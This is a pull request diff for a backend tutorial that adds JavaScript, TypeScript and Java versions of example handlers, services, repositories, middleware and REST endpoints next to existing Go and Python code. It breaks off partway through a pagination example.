### PR TITLE
feat(chapters): add JavaScript, TypeScript and Java code tabs to chap…

### DIFF
--- a/src/content/chapters/06-controllers-services-and-middlewares.mdx
+++ b/src/content/chapters/06-controllers-services-and-middlewares.mdx
@@ -2,7 +2,7 @@
 order: 6
 title: "Handlers, Services & Repositories."
 navTitle: "Controllers, Services & Middlewares"
-summary: "A first-principles walkthrough of how a single HTTP request travels inside your server, through routing, the three architectural layers, the middleware chain, and the request context that ties it all together. Complete implementations in Go and Python shown side by side."
+summary: "A first-principles walkthrough of how a single HTTP request travels inside your server, through routing, the three architectural layers, the middleware chain, and the request context that ties it all together. Complete implementations in Go, Python, JavaScript, TypeScript and Java shown side by side."
 readingTime: "2-3 hours"
 keywords:
   - "controllers"
@@ -108,11 +108,11 @@ With those two objects in hand, the handler runs through a precise, ordered work
 
 ### A note on Node.js vs Go & Python
 
-In a Node.js/Express app the deserialization step often happens _upstream_ in a middleware (the `json()` body parser), so JSON is already a JavaScript object by the time your handler runs. In **Go** and **Python** you typically deserialize _explicitly_ inside the handler, into a struct, a dictionary, or a class.
+In a Node.js/Express app the deserialization step often happens _upstream_ in a middleware (the `json()` body parser), so JSON is already a JavaScript object by the time your handler runs. Spring goes further still and binds the body into a record before your method is even called. In **Go** and **Python** you typically deserialize _explicitly_ inside the handler, into a struct, a dictionary, or a class. The step never disappears, it only moves: the further upstream it runs, the less of it you write yourself.
 
 #### Step 1: 2 / Extract & bind the body; 400 on failure
 
-```go title="create_book / handler Go Python"
+```go title="create_book / handler Go Python JavaScript TypeScript Java"
 // CreateBookRequest is our native format, the bind target.
 type CreateBookRequest struct {
     Title  string `json:"title"`
@@ -151,11 +151,85 @@ def create_book_handler():
     # ... validation, transformation, delegation follow ...
 ```
 
+```js
+// Express's json() body parser has already deserialized the body upstream,
+// so req.body is a JavaScript object by the time the handler runs. That
+// makes step 1 free and turns step 2 into "check the shape you expected".
+app.post('/books', (req, res) => {
+  // Step 1 + 2: extract the body and bind the fields we accept.
+  const { title, author } = req.body ?? {}
+
+  // express.json() leaves req.body empty when the payload is malformed.
+  if (typeof title !== 'string' || typeof author !== 'string') {
+    // Binding failed -> the payload is malformed.
+    return res.status(400).json({ error: 'invalid request body' }) // 400
+  }
+
+  const createBookRequest = { title, author }
+  // ... validation, transformation, delegation follow ...
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+// CreateBookRequest is our native format, the bind target.
+interface CreateBookRequest {
+  title: string
+  author: string
+}
+
+// A parsed body is `unknown` until something proves its shape. A type
+// guard is that proof, and it is what lets the rest of the handler treat
+// `req.body` as a CreateBookRequest without a cast.
+function isCreateBookRequest(value: unknown): value is CreateBookRequest {
+  const body = value as Partial<CreateBookRequest> | null
+  return typeof body?.title === 'string' && typeof body?.author === 'string'
+}
+
+export function createBookHandler(req: Request, res: Response): void {
+  // Step 1 + 2: extract the body and deserialize (bind) into the type.
+  if (!isCreateBookRequest(req.body)) {
+    // Deserialization failed -> the payload is malformed.
+    res.status(400).json({ error: 'invalid request body' }) // 400
+    return // terminate the request here; do not proceed.
+  }
+
+  const body: CreateBookRequest = req.body
+  // ... validation, transformation, delegation follow ...
+}
+```
+
+```java
+// CreateBookRequest is our native format, the bind target.
+public record CreateBookRequest(String title, String author) {}
+
+@RestController
+class BookController {
+
+    // Step 1 + 2 happen BEFORE this method runs: @RequestBody tells Spring
+    // to read the body and let Jackson deserialize it into the record.
+    @PostMapping("/books")
+    ResponseEntity<?> createBook(@RequestBody CreateBookRequest req) {
+        // ... validation, transformation, delegation follow ...
+        return ResponseEntity.status(HttpStatus.CREATED).build(); // 201
+    }
+
+    // A body Jackson cannot read never reaches the handler, it arrives
+    // here instead. Same outcome as the explicit `if` above: 400.
+    @ExceptionHandler(HttpMessageNotReadableException.class)
+    ResponseEntity<?> onUnreadableBody() {
+        return ResponseEntity.badRequest()
+            .body(Map.of("error", "invalid request body")); // 400
+    }
+}
+```
+
 #### Step 3: 4 / Validate, then transform (inject a default for an optional query param)
 
 A good API design rule: make query parameters **optional** wherever possible. Consider `GET /books?sort=name|date`. If the client sends nothing, validation must still pass, so the transformation step injects a sensible default.
 
-```go title="list_books / validate + transform Go Python"
+```go title="list_books / validate + transform Go Python JavaScript TypeScript Java"
 func ListBooksHandler(w http.ResponseWriter, r *http.Request) {
     sort := r.URL.Query().Get("sort") // "" if absent
 
@@ -200,6 +274,80 @@ def list_books_handler():
     return jsonify(books), 200  # array of books
 ```
 
+```js
+app.get('/books', async (req, res) => {
+  const sort = req.query.sort // undefined if absent
+
+  // VALIDATION: if present, it must be one of the allowed values.
+  if (sort !== undefined && sort !== 'name' && sort !== 'date') {
+    return res.status(400).json({ error: "sort must be 'name' or 'date'" })
+  }
+
+  // TRANSFORMATION: query params are optional -> inject a default.
+  const sortBy = sort ?? 'date' // downstream layers never see undefined
+
+  try {
+    const books = await bookService.listBooks(sortBy) // delegate
+    res.status(200).json(books) // 200 with the array of books
+  } catch {
+    res.status(500).json({ error: 'could not fetch books' }) // 500
+  }
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+const SORTS = ['name', 'date'] as const
+type Sort = (typeof SORTS)[number]
+
+export async function listBooksHandler(req: Request, res: Response): Promise<void> {
+  const sort = req.query.sort // string | string[] | undefined | ...
+
+  // VALIDATION: if present, it must be one of the allowed values.
+  if (sort !== undefined && !SORTS.includes(sort as Sort)) {
+    res.status(400).json({ error: "sort must be 'name' or 'date'" })
+    return
+  }
+
+  // TRANSFORMATION: optional param -> inject a default. Note what the
+  // narrowed type buys you: the service takes a `Sort`, so a typo in a
+  // future edit stops compiling instead of reaching the database.
+  const sortBy: Sort = (sort as Sort | undefined) ?? 'date'
+
+  try {
+    const books = await bookService.listBooks(sortBy) // delegate
+    res.status(200).json(books) // 200 with the array of books
+  } catch {
+    res.status(500).json({ error: 'could not fetch books' }) // 500
+  }
+}
+```
+
+```java
+@GetMapping("/books")
+ResponseEntity<?> listBooks(@RequestParam(required = false) String sort) {
+    // VALIDATION: if present, it must be one of the allowed values.
+    if (sort != null && !sort.equals("name") && !sort.equals("date")) {
+        return ResponseEntity.badRequest()
+            .body(Map.of("error", "sort must be 'name' or 'date'")); // 400
+    }
+
+    // TRANSFORMATION: query params are optional -> inject a default.
+    // (@RequestParam(defaultValue = "date") would do exactly this for you;
+    // it is spelled out here so the step stays visible.)
+    String sortBy = (sort == null) ? "date" : sort;
+
+    try {
+        List<Book> books = bookService.listBooks(sortBy); // delegate
+        return ResponseEntity.ok(books); // 200 with the array of books
+    } catch (DataAccessException e) {
+        return ResponseEntity.internalServerError()
+            .body(Map.of("error", "could not fetch books")); // 500
+    }
+}
+```
+
 ## 06The Service Layer
 
 The service layer is where the **actual processing**: the business logic, happens. The single most important rule governs it:
@@ -214,7 +362,7 @@ This isolation is what keeps the system decoupled. The service decides _what to 
 
 A single service method can do a great deal. It can call **one or several repository methods** and merge their results, make external API calls, send emails, fire notifications, anything the business operation requires. This coordinating role is called **orchestration**: the service stitches together data from multiple sources and returns a single clean result to the handler. A service that only sends an email may never touch the repository at all.
 
-```go title="book_service / pure business logic Go Python"
+```go title="book_service / pure business logic Go Python JavaScript TypeScript Java"
 // Notice: no http.Request, no ResponseWriter, no status codes.
 // You cannot tell from this signature that it serves an API.
 func (s *BookService) ListBooks(ctx context.Context, sort string) ([]Book, error) {
@@ -251,6 +399,80 @@ class BookService:
         self.mailer.send(email, "Your book was added")
 ```
 
+```js
+// Notice: no req, no res, no status codes.
+// You cannot tell from these methods that they serve an API.
+class BookService {
+  constructor(repo, mailer) {
+    this.repo = repo
+    this.mailer = mailer
+  }
+
+  async listBooks(sort) {
+    // Orchestration: call the repository for the data it needs.
+    const books = await this.repo.findAllBooks(sort)
+    // Could also: enrich, merge other repo calls, send notifications...
+    return books
+  }
+
+  // A service that needs no database at all is perfectly valid:
+  async notifyOwner(email) {
+    await this.mailer.send(email, 'Your book was added')
+  }
+}
+```
+
+```ts
+// The types tell the same story the comments do: every name in this
+// signature is a domain word (Book, Sort, Mailer). Not one of them is
+// an HTTP word, which is exactly the isolation we are after.
+export class BookService {
+  constructor(
+    private readonly repo: BookRepo,
+    private readonly mailer: Mailer,
+  ) {}
+
+  async listBooks(sort: Sort): Promise<Book[]> {
+    // Orchestration: ask the repository for what it needs.
+    const books = await this.repo.findAllBooks(sort)
+    // Could merge other repo calls, enrich, notify, etc.
+    return books
+  }
+
+  // A purely-logic service that never touches the DB:
+  async notifyOwner(email: string): Promise<void> {
+    await this.mailer.send(email, 'Your book was added')
+  }
+}
+```
+
+```java
+// No HttpServletRequest, no ResponseEntity, no status codes. Nothing here
+// says "web", this class would work unchanged behind a CLI or a queue.
+@Service
+public class BookService {
+    private final BookRepo repo;
+    private final Mailer mailer;
+
+    BookService(BookRepo repo, Mailer mailer) {
+        this.repo = repo;
+        this.mailer = mailer;
+    }
+
+    public List<Book> listBooks(String sort) {
+        // Orchestration: call the repository for the data it needs.
+        List<Book> books = repo.findAllBooks(sort);
+        // Could also: enrich, merge other repo calls, send notifications...
+        return books;
+    }
+
+    // A service that needs no database at all is perfectly valid:
+    public void notifyOwner(String email) {
+        mailer.send(email, "Your book was added");
+    }
+}
+```
+
 ## 07The Repository Layer
 
 The repository (or _database_) layer has a single concern: **talking to the database**. It receives data from the service, **constructs the database query**: for inserting, filtering, or sorting, runs it, and returns the raw result back up to the service.
@@ -259,7 +481,7 @@ The repository (or _database_) layer has a single concern: **talking to the data
 A repository method should do **one thing** and return **one kind of data**. Do _not_ write a single method that, depending on an optional parameter, returns either one book or all books. Instead write two distinct methods: `FindAllBooks()` and `FindBookByID(id)`.
 </Callout>
 
-```go title="book_repository / one job per method Go Python"
+```go title="book_repository / one job per method Go Python JavaScript TypeScript Java"
 // ONE method, ONE shape of result: all books, sorted.
 func (r *BookRepo) FindAllBooks(ctx context.Context, sort string) ([]Book, error) {
     // Build the query from the data the service handed down.
@@ -304,6 +526,92 @@ class BookRepo:
         cur = self.db.execute(
             "SELECT id, title, author FROM books WHERE id = ?", (book_id,))
         return dict(cur.fetchone())
+```
+
+```js
+class BookRepo {
+  constructor(db) {
+    this.db = db // a node-postgres Pool
+  }
+
+  // ONE method, ONE shape of result: all books, sorted.
+  async findAllBooks(sort) {
+    // A column name can never be a bound parameter, so it goes through a
+    // fixed lookup rather than into the string. Values always use $1, $2.
+    const column = { name: 'title', date: 'created_at' }[sort] ?? 'created_at'
+    const { rows } = await this.db.query(
+      `SELECT id, title, author FROM books ORDER BY ${column}`)
+    return rows
+  }
+
+  // SEPARATE method for one book. No optional toggle parameter.
+  async findBookById(id) {
+    const { rows } = await this.db.query(
+      'SELECT id, title, author FROM books WHERE id = $1', [id])
+    return rows[0] ?? null
+  }
+}
+```
+
+```ts
+import type { Pool } from 'pg'
+
+const SORT_COLUMNS: Record<Sort, string> = { name: 'title', date: 'created_at' }
+
+export class BookRepo {
+  constructor(private readonly db: Pool) {}
+
+  // ONE method, ONE shape of result: all books, sorted.
+  async findAllBooks(sort: Sort): Promise<Book[]> {
+    // Because `sort` is a `Sort` and not a `string`, the lookup is total:
+    // there is no value it could hold that produces a column we did not
+    // write ourselves. The type is the injection defence.
+    const { rows } = await this.db.query<Book>(
+      `SELECT id, title, author FROM books ORDER BY ${SORT_COLUMNS[sort]}`)
+    return rows
+  }
+
+  // SEPARATE method for one book. No optional toggle parameter.
+  // The return type says "may be missing" out loud, so the service has
+  // to decide what that means instead of tripping over undefined.
+  async findBookById(id: number): Promise<Book | null> {
+    const { rows } = await this.db.query<Book>(
+      'SELECT id, title, author FROM books WHERE id = $1', [id])
+    return rows[0] ?? null
+  }
+}
+```
+
+```java
+@Repository
+public class BookRepo {
+    // A column name can never be a bound parameter, so it goes through a
+    // fixed map rather than into the string. Values always use ?.
+    private static final Map<String, String> SORT_COLUMNS =
+        Map.of("name", "title", "date", "created_at");
+
+    private final JdbcClient db;
+
+    BookRepo(JdbcClient db) {
+        this.db = db;
+    }
+
+    // ONE method, ONE shape of result: all books, sorted.
+    public List<Book> findAllBooks(String sort) {
+        String column = SORT_COLUMNS.getOrDefault(sort, "created_at");
+        return db.sql("SELECT id, title, author FROM books ORDER BY " + column)
+                 .query(Book.class)
+                 .list();
+    }
+
+    // SEPARATE method for one book. No optional toggle parameter.
+    public Optional<Book> findBookById(long id) {
+        return db.sql("SELECT id, title, author FROM books WHERE id = ?")
+                 .param(id)
+                 .query(Book.class)
+                 .optional();
+    }
+}
 ```
 
 ## 08The Full Lifecycle, End to End
@@ -362,7 +670,7 @@ The third thing a middleware receives is **`next`**, a function. Calling `next()
 
 Because a middleware has both the request and response objects, it can read and modify the request, and it can terminate the request right where it stands by returning a response. That is the full extent of a middleware's power.
 
-```go title="middleware shape / req, res, next Go Python"
+```go title="middleware shape / req, res, next Go Python JavaScript TypeScript Java"
 // In Go, middleware wraps the "next" handler. Calling next.ServeHTTP
 // is the equivalent of next(): pass execution along the chain.
 func LoggingMiddleware(next http.Handler) http.Handler {
@@ -393,6 +701,70 @@ def logging_middleware(next):
 
         return next(request)  # === next(): continue the chain ===
     return wrapper
+```
+
+```js
+// Express middleware is the shape the whole idea is named after:
+// (req, res, next). Calling next() passes execution along the chain.
+function loggingMiddleware(req, res, next) {
+  console.log(`${req.method} ${req.path}`) // do work
+
+  // EARLY EXIT example (short-circuit, never calls next):
+  if (req.get('X-Blocked') === 'yes') {
+    return res.status(403).send('forbidden') // request stops here
+  }
+
+  next() // === next(): continue the chain ===
+}
+
+app.use(loggingMiddleware)
+```
+
+```ts
+import type { NextFunction, Request, Response } from 'express'
+
+// The three parameters, spelled out by their types: the request, the
+// response, and the `next` callable that invokes the rest of the chain.
+// The `void` return is the reminder that a middleware communicates by
+// calling next() or by writing a response, never by returning a value.
+function loggingMiddleware(req: Request, res: Response, next: NextFunction): void {
+  console.log(`${req.method} ${req.path}`) // do work
+
+  // EARLY EXIT example (short-circuit, never calls next):
+  if (req.get('X-Blocked') === 'yes') {
+    res.status(403).send('forbidden') // request stops here
+    return
+  }
+
+  next() // === next(): continue the chain ===
+}
+
+app.use(loggingMiddleware)
+```
+
+```java
+// A servlet Filter is Java's middleware. It receives the request, the
+// response, and a FilterChain, and chain.doFilter IS next(): pass
+// execution to the next filter, or on to the controller.
+@Component
+public class LoggingFilter extends OncePerRequestFilter {
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req,
+                                    HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        log.info("{} {}", req.getMethod(), req.getRequestURI()); // do work
+
+        // EARLY EXIT example (short-circuit, never calls the chain):
+        if ("yes".equals(req.getHeader("X-Blocked"))) {
+            res.sendError(HttpServletResponse.SC_FORBIDDEN, "forbidden");
+            return; // request stops here
+        }
+
+        chain.doFilter(req, res); // === next(): continue the chain ===
+    }
+}
 ```
 
 #### Why middleware at all?
@@ -447,7 +819,7 @@ Serialization/deserialization, and even validation/transformation, can be delega
 
 #### The CORS & Authentication middlewares in code
 
-```go title="cors + auth middleware Go Python"
+```go title="cors + auth middleware Go Python JavaScript TypeScript Java"
 var allowedOrigin = "https://app.example.com"
 
 func CORSMiddleware(next http.Handler) http.Handler {
@@ -502,12 +874,109 @@ def auth_middleware(next):
     return wrapper
 ```
 
+```js
+const ALLOWED_ORIGIN = 'https://app.example.com'
+
+function corsMiddleware(req, res, next) {
+  const origin = req.get('Origin') // runtime gives us this
+  if (origin === ALLOWED_ORIGIN) {
+    res.set('Access-Control-Allow-Origin', origin)
+  }
+  next() // pass along; browser blocks if header absent
+}
+
+function authMiddleware(req, res, next) {
+  const token = req.get('Authorization')
+  let claims
+  try {
+    claims = verifyToken(token)
+  } catch {
+    return res.status(401).send('unauthorized') // 401, stop
+  }
+  // SUCCESS: stash identity in the request context, then continue.
+  req.context = { ...req.context, userId: claims.userId, role: claims.role }
+  next()
+}
+```
+
+```ts
+import type { NextFunction, Request, Response } from 'express'
+
+const ALLOWED_ORIGIN = 'https://app.example.com'
+
+export function corsMiddleware(req: Request, res: Response, next: NextFunction): void {
+  const origin = req.get('Origin') // runtime gives us this
+  if (origin === ALLOWED_ORIGIN) {
+    res.set('Access-Control-Allow-Origin', origin)
+  }
+  next() // pass along; browser blocks if header absent
+}
+
+export function authMiddleware(req: Request, res: Response, next: NextFunction): void {
+  const token = req.get('Authorization')
+  let claims: TokenClaims
+  try {
+    claims = verifyToken(token)
+  } catch {
+    res.status(401).send('unauthorized') // 401, stop
+    return
+  }
+  // SUCCESS: stash identity in the request context, then continue.
+  // `req.context` is typed once via declaration merging (next section),
+  // so every handler downstream reads it without a cast.
+  req.context = { ...req.context, userId: claims.userId, role: claims.role }
+  next()
+}
+```
+
+```java
+@Component
+public class CorsFilter extends OncePerRequestFilter {
+    private static final String ALLOWED_ORIGIN = "https://app.example.com";
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        String origin = req.getHeader("Origin"); // runtime gives us this
+        if (ALLOWED_ORIGIN.equals(origin)) {
+            res.setHeader("Access-Control-Allow-Origin", origin);
+        }
+        chain.doFilter(req, res); // pass along; browser blocks if header absent
+    }
+}
+
+@Component
+public class AuthFilter extends OncePerRequestFilter {
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        String token = req.getHeader("Authorization");
+        TokenClaims claims;
+        try {
+            claims = verifyToken(token);
+        } catch (InvalidTokenException e) {
+            res.sendError(HttpServletResponse.SC_UNAUTHORIZED, "unauthorized"); // 401, stop
+            return;
+        }
+        // SUCCESS: stash identity in the request context, then continue.
+        // Request attributes ARE the servlet request context: a key-value
+        // map that lives and dies with this one request.
+        req.setAttribute("userId", claims.userId());
+        req.setAttribute("role", claims.role());
+        chain.doFilter(req, res);
+    }
+}
+```
+
 ## 13What Request Context Is
 
 The auth middleware just did something subtle: it stored the user ID and role somewhere so that a later handler could read them. That "somewhere" is the **request context**.
 
 <Callout type="info" title="Definition / Request Context">
-A piece of **storage or state**: usually a simple key–value store, that is **scoped to a single HTTP request**. Every request gets its own context; it does not leak into other requests. Every framework in every language (Node, Go, Python) ships some implementation of this concept; the mechanics differ, the idea is the same.
+A piece of **storage or state**: usually a simple key–value store, that is **scoped to a single HTTP request**. Every request gets its own context; it does not leak into other requests. Every framework in every language ships some implementation of this concept, Go's `context.Context`, Express's `req` object, a servlet's request attributes, Python's request-scoped globals; the mechanics differ, the idea is the same.
 </Callout>
 
 Why does it exist? Because a request passes through many **isolated function boundaries**: CORS, logging, routing, auth, permission checks, the handler, the error handler. The context gives all of them a shared place to read and write state **without tightly coupling** them, without one middleware having to explicitly pass values into the next by hand.
@@ -526,7 +995,7 @@ The canonical use. The auth middleware verifies credentials, extracts the `user_
 If you took the `user_id` from the client payload, a malicious client could send _someone else's_ ID and act as them. Reading identity from the context, populated only by your verified auth middleware, closes that hole. The same context-stored role drives permission checks (is this user an admin? does it have write access?).
 </Callout>
 
-```go title="handler reads identity from context Go Python"
+```go title="handler reads identity from context Go Python JavaScript TypeScript Java"
 func CreateBookHandler(w http.ResponseWriter, r *http.Request) {
     var req CreateBookRequest
     json.NewDecoder(r.Body).Decode(&req)
@@ -565,13 +1034,80 @@ def create_book_handler(request):
     return jsonify(book), 201
 ```
 
+```js
+app.post('/books', async (req, res) => {
+  const { title, author } = req.body ?? {}
+
+  // Read the trusted user id FROM THE CONTEXT, not from the body.
+  // The auth middleware put it there after verifying the token.
+  const { userId, role } = req.context
+
+  if (role !== 'admin' && role !== 'user') {
+    return res.status(403).send('forbidden')
+  }
+
+  // Persist with the SERVER-VERIFIED owner id, never the client's.
+  const book = await bookService.create({ title, author }, userId)
+  res.status(201).json(book) // 201
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+// Declare the context's shape ONCE and every handler in the codebase
+// sees it. This is how you stop `req.context` from decaying into an
+// `any` bag that each handler guesses at.
+declare module 'express-serve-static-core' {
+  interface Request {
+    context: { userId: number; role: string; requestId: string }
+  }
+}
+
+export async function createBookHandler(req: Request, res: Response): Promise<void> {
+  const body = req.body as CreateBookRequest
+
+  // Read the trusted user id FROM THE CONTEXT, not from the body.
+  // The auth middleware put it there after verifying the token.
+  const { userId, role } = req.context
+
+  if (role !== 'admin' && role !== 'user') {
+    res.status(403).send('forbidden')
+    return
+  }
+
+  // Persist with the SERVER-VERIFIED owner id, never the client's.
+  const book = await bookService.create(body, userId)
+  res.status(201).json(book) // 201
+}
+```
+
+```java
+@PostMapping("/books")
+ResponseEntity<?> createBook(@RequestBody CreateBookRequest req,
+                             HttpServletRequest http) {
+    // Read the trusted user id FROM THE REQUEST CONTEXT, not from req.
+    // The auth filter put it there after verifying the token.
+    long userId = (long) http.getAttribute("userId");
+    String role = (String) http.getAttribute("role");
+
+    if (!role.equals("admin") && !role.equals("user")) {
+        return ResponseEntity.status(HttpStatus.FORBIDDEN).body("forbidden");
+    }
+
+    // Persist with the SERVER-VERIFIED owner id, never the client's.
+    Book book = bookService.create(req, userId);
+    return ResponseEntity.status(HttpStatus.CREATED).body(book); // 201
+}
+```
+
 ## 15Use Cases / Tracing & Cancellation
 
 ### Request tracing
 
 An early middleware can generate a unique ID (a UUID) and save it in the context. For the entire lifecycle of that request, every log line can include this ID, and any outbound calls to other microservices can forward it in a header like `X-Request-ID`. When you later audit your logs to debug a problem, that single ID lets you **trace one request across every service it touched**: where it started and everywhere it went.
 
-```go title="request-id middleware Go Python"
+```go title="request-id middleware Go Python JavaScript TypeScript Java"
 func RequestIDMiddleware(next http.Handler) http.Handler {
     return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
         id := uuid.NewString() // one unique id for this request
@@ -597,6 +1133,60 @@ def request_id_middleware(next):
     return wrapper
 ```
 
+```js
+import { randomUUID } from 'node:crypto'
+
+function requestIdMiddleware(req, res, next) {
+  const id = randomUUID() // one unique id for this request
+  req.context = { ...req.context, requestId: id }
+  res.set('X-Request-ID', id) // echo it back / forward it
+  console.log(`[${id}] ${req.method} ${req.path}`)
+  next()
+}
+```
+
+```ts
+import { randomUUID } from 'node:crypto'
+import type { NextFunction, Request, Response } from 'express'
+
+export function requestIdMiddleware(req: Request, res: Response, next: NextFunction): void {
+  const id = randomUUID() // one unique id for this request
+  req.context = { ...req.context, requestId: id }
+  res.set('X-Request-ID', id) // echo it back / forward it
+  console.log(`[${id}] ${req.method} ${req.path}`)
+  // Node also ships AsyncLocalStorage, which carries the id through
+  // awaits into code that never sees `req` at all, the logger, the
+  // database layer, an outbound fetch. Same context, no hand-off.
+  next()
+}
+```
+
+```java
+@Component
+public class RequestIdFilter extends OncePerRequestFilter {
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        String id = UUID.randomUUID().toString(); // one unique id for this request
+        req.setAttribute("requestId", id);
+        res.setHeader("X-Request-ID", id); // echo it back / forward it
+
+        // MDC is the logging framework's own per-request context. Put the
+        // id in once and EVERY log line from this request carries it, with
+        // no logging call having to pass it along by hand.
+        MDC.put("requestId", id);
+        try {
+            log.info("{} {}", req.getMethod(), req.getRequestURI());
+            chain.doFilter(req, res);
+        } finally {
+            MDC.clear(); // threads are pooled, never leak it to the next request
+        }
+    }
+}
+```
+
 ### Cancellation, abort signals & deadlines
 
 The request context is also the standard place to carry **cancellation signals** and **deadlines**. If a client disconnects or a deadline passes, those signals propagate to downstream external calls, so a service never **hangs perpetually** waiting on work that no longer matters. In Go this is the built-in `context.Context` with `WithTimeout`; in Python it surfaces as timeouts / cancellation tokens passed along the call chain.
@@ -605,4 +1195,4 @@ The request context is also the standard place to carry **cancellation signals**
 A request enters at the entry point, flows through an ordered chain of middlewares and routing, lands in a handler that validates and transforms the data, delegates to a service that orchestrates the business logic, which calls repositories for database work, all while a per-request **context** carries identity, a trace ID, and deadlines alongside it. The result climbs back up, and the handler chooses a status code and sends the response. That is the full request lifecycle.
 </Callout>
 
-Backend from First Principles / Chapter 06 / Layers. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 06 / Layers. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/07-api-design-rest.mdx
+++ b/src/content/chapters/07-api-design-rest.mdx
@@ -205,7 +205,7 @@ Two clients GET the same record. A changes the email and saves. B (who never saw
 
 ______
 
-GoPython
+Go Python JavaScript TypeScript Java
 
 PATCH with optimistic-concurrency guard
 
@@ -247,6 +247,72 @@ def update_organization(id: str, body: dict, if_match: str | None = Header(None)
     )                                  # 200 + updated entity
 ```
 
+```js
+app.patch('/v1/organizations/:id', async (req, res) => {
+  const org = await store.get(req.params.id)
+  if (!org) {
+    return res.status(404).json(errBody('organization not found'))
+  }
+  // optimistic concurrency: reject stale writes
+  const ifMatch = req.get('If-Match')
+  if (ifMatch && ifMatch !== org.etag) {
+    return res.status(412).json(errBody('resource changed; re-fetch and retry'))
+  }
+  const updated = await store.patch(req.params.id, req.body) // merge, don't replace
+  res.set('ETag', updated.etag)
+  res.status(200).json(updated)                              // 200 + updated entity
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+export async function updateOrganization(req: Request, res: Response): Promise<void> {
+  const org = await store.get(req.params.id)
+  if (org === null) {
+    res.status(404).json(errBody('organization not found'))
+    return
+  }
+  // optimistic concurrency: reject stale writes
+  const ifMatch = req.get('If-Match')
+  if (ifMatch !== undefined && ifMatch !== org.etag) {
+    res.status(412).json(errBody('resource changed; re-fetch and retry'))
+    return
+  }
+  // `Partial<Organization>` IS the PATCH contract written as a type: every
+  // field optional, and absent means "leave it alone". Typing the body as
+  // `Organization` here would quietly re-introduce the PUT trap.
+  const patch = req.body as Partial<Organization>
+  const updated = await store.patch(req.params.id, patch) // merge, don't replace
+  res.set('ETag', updated.etag)
+  res.status(200).json(updated)                           // 200 + updated entity
+}
+```
+
+```java
+@PatchMapping("/v1/organizations/{id}")
+ResponseEntity<?> updateOrganization(
+        @PathVariable String id,
+        @RequestBody Map<String, Object> patch, // only the fields to change
+        @RequestHeader(value = "If-Match", required = false) String ifMatch) {
+
+    Organization org = store.get(id);
+    if (org == null) {
+        return ResponseEntity.status(HttpStatus.NOT_FOUND)
+            .body(errBody("organization not found"));
+    }
+    // optimistic concurrency: reject stale writes
+    if (ifMatch != null && !ifMatch.equals(org.etag())) {
+        return ResponseEntity.status(HttpStatus.PRECONDITION_FAILED)
+            .body(errBody("resource changed; re-fetch and retry")); // 412
+    }
+    Organization updated = store.patch(id, patch); // merge, don't replace
+    return ResponseEntity.ok()
+        .eTag(updated.etag())
+        .body(updated);                            // 200 + updated entity
+}
+```
+
 | Code                         | On a PUT / PATCH, this means                                                         |
 | ---------------------------- | ------------------------------------------------------------------------------------ |
 | `200 OK`                     | Updated; body holds the new state.                                                   |
@@ -277,7 +343,7 @@ Say you `POST /payments {amount: 5000}` and the network drops _after_ the server
 
 ______
 
-GoPython
+Go Python JavaScript TypeScript Java
 
 making POST retry-safe with an idempotency key
 
@@ -311,6 +377,70 @@ def create_payment(body: dict, idempotency_key: str = Header(...)):
     payment = charge(body["amount"])               # the real, non-idempotent side effect
     idem_store.save(idempotency_key, 201, payment) # remember it, keyed by the idempotency key
     return payment
+```
+
+```js
+app.post('/v1/payments', async (req, res) => {
+  const key = req.get('Idempotency-Key') // client-generated UUID
+
+  // already processed this exact request? return the SAME result, don't re-charge
+  const prior = await idemStore.get(key)
+  if (prior) {
+    return res.status(prior.status).json(prior.body)
+  }
+
+  const payment = await charge(req.body.amount) // the real, non-idempotent side effect
+  await idemStore.save(key, 201, payment)       // remember it, keyed by the idempotency key
+  res.status(201).json(payment)
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+interface StoredResult {
+  status: number
+  body: Payment
+}
+
+export async function createPayment(req: Request, res: Response): Promise<void> {
+  const key = req.get('Idempotency-Key') // client-generated UUID
+  if (key === undefined) {
+    res.status(400).json(errBody('Idempotency-Key header is required'))
+    return
+  }
+
+  // already processed this exact request? return the SAME result, don't re-charge
+  const prior: StoredResult | null = await idemStore.get(key)
+  if (prior !== null) {
+    res.status(prior.status).json(prior.body)
+    return
+  }
+
+  // Worth knowing: this read-then-write is itself racy if two retries land
+  // at once. In production the key is claimed with a single atomic insert
+  // (a unique index on the key), and a duplicate insert means "someone else
+  // is already charging this, wait for their result".
+  const payment = await charge(req.body.amount as number) // the non-idempotent side effect
+  await idemStore.save(key, 201, payment) // remember it, keyed by the idempotency key
+  res.status(201).json(payment)
+}
+```
+
+```java
+@PostMapping("/v1/payments")
+ResponseEntity<?> createPayment(@RequestBody PaymentRequest in,
+                                @RequestHeader("Idempotency-Key") String key) {
+    // already processed this exact request? return the SAME result, don't re-charge
+    Optional<StoredResult> prior = idemStore.get(key);
+    if (prior.isPresent()) {
+        return ResponseEntity.status(prior.get().status()).body(prior.get().body());
+    }
+
+    Payment payment = charge(in.amount()); // the real, non-idempotent side effect
+    idemStore.save(key, 201, payment);     // remember it, keyed by the idempotency key
+    return ResponseEntity.status(HttpStatus.CREATED).body(payment);
+}
 ```
 
 | Code                         | On a POST, this means                                                    |
@@ -380,7 +510,7 @@ Pass resource fields as query params to narrow the list: `?status=active`, or co
 
 ______
 
-GoPython
+Go Python JavaScript TypeScript Java
 
 list endpoint / page / sort / filter / sane defaults
 
@@ -435,6 +565,99 @@ def list_organizations(
         "page": page,
         "totalPages": total_pages,
     }
+```
+
+```js
+// GET /v1/organizations?status=active&sortBy=name&sortOrder=ascending&page=1&limit=10
+app.get('/v1/organizations', async (req, res) => {
+  const q = req.query
+
+  // --- sane defaults: never crash if the client omits params ---
